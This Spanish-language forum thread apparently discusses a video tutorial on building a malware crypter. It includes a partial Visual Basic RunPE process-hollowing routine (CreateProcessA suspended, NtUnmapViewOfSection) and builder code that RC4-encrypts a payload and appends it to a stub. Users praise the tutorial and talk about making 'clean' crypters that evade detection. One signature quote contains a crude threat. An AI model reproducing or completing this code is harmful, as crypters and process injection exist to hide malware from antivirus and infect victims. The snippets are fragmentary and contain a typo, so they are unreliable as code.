Pimeo escribió:
alexkof escribió:alguien me podria pasar el Source Run Pe de Cobein ke no lo he consiguido por ningun lado, y tratando de copiar el ke esta en el video pero la ultima parte ke es ta

Código: Seleccionar todo

Public Sub Injec(ByVal sHost As String, ByRef bvBuff() As Byte, parameter As String)
Dim i As long 
Dim Pidh As IMAGE_DOS_HEADER
Dim Pinh As IMAGE_NT_HEADERS
Dim Pish As IMAGE_SECTUIB_HEADER
Dim Si As STARTUPINFO
Dim Pi As PROCESS_INFORMATION
Dim Ctx As Context

Si.cb = Len (Si)

RtlMoveMemory Pidh, bvBuff(0),64
RtlMoveMemory Pinh, bvBuff(Pidh.e_lfanew),248

CreateProcessA sHost, " " & parameter, 0, 0, False, CREATE_SUSPENDED, 0, 0, Si, Pi
CallApi "ntdll","NtUnmapViewOfSection", Pi.hProcess, Pinh.OptionalHeader.ImageBase, Pinh.OptionalHeader 

me keda incompleta, alguien ke me la mande o ke la postie aki porfa ke ando baradillo por eso
saludos gracias

Fijate en la Pagina tres que Skyweb07 lo posteo
gracias pimeo muy amable
[img alt="noproxy"]http://fotocarlos.ifastnet.com/firma/[/img]
Buenas...como va tanto tiempo?? como se agrando la paginita

bueh..me pasaba rapidito, y me quede con ganas de ver ese video, pero la pagina esta saturadisima...alguien lo tiene para subir??

saludos
muito bom cara parabens pelo tutorial
Imagen
wildbridge escribió:Buenas...como va tanto tiempo?? como se agrando la paginita

bueh..me pasaba rapidito, y me quede con ganas de ver ese video, pero la pagina esta saturadisima...alguien lo tiene para subir??

saludos

A mi me funciona perfectamente recuerda que la pagina ya no es el .com ahora es: [Enlace externo eliminado para invitados]

Salu2

Mostrar/Ocultar

Seritx gracias!!!

Me pase por alto eso!!!

saludos
Dios increible por dios , mira Skyweb07 yo te comia los huevo te lo juro bueno muxas gracias por el videotuto
Me puse a investigar sobre el tema muy contento que se me olvido agradecer!!!!

Muchas gracias por esto Skyweb07!! de verdad..espero dentro de poco puedas ver nuestros avances...

un saludo
se puede tomar codigos de otros crypter y hacer uno linpio y fresco yeahh
Imagen
Imagen
Imagen
Y el textbox de la pass para que sirve ?
y como se genera la clave??
a vale, me pensaba que eran esos generadores que creaban codes aletorios. Tanks

Edit:

En que parte esta la pass a cambiar ???

Código: Seleccionar todo

'Ahora usaremos la encriptación RC4 pero ustedes pueden usar cualquiera que les plasca!
        Archivo = RC4(Archivo, txtkey.Text)  'Encriptamos el Archivo ! 'Cambiamos esto de Skyweb07 por la contraeña que estara en el txtkey

Open CD.FileName For Binary As #1 'Abrimos un Archivo binario k selecciono el usuario anteriormente!
        Put #1, , Stub & "##$$##" & Archivo & "##$$##" & txtkey.Text & "##$$##" 'Y Ahora tambien ponemos la contraseña en el Archivo 'Aqui lo que hacemos es meter los datos del Stub al Archivo y tambien metemos el Archivo encriptado separado por Unos Splits k en este caso son "##$$##" para poder separar mas adelante los datos en el Stub !
        Close #1 ' Cerramos el Archivo!

MsgBox "Archivo Encriptado Correctamente!", vbInformation, Me.Caption
        End If
Con estos tutos a cualquiera le dan ganas de aprender
Hasta ahora nada habia hecho cambiar mi firma.... Pero esto es un clasico... xD
polifemo escribió:any... Estoy rifando una patada en el culo y vos te estás comprando todos los números....Tus eternos comentarios de libertad e igualdad de hippie fracasado me tienen los huevos al plato....Aflojá hermano... porque te convierto en historia....
POLIFEMO.
Cerrado

Volver a “Manuales y Tutoriales”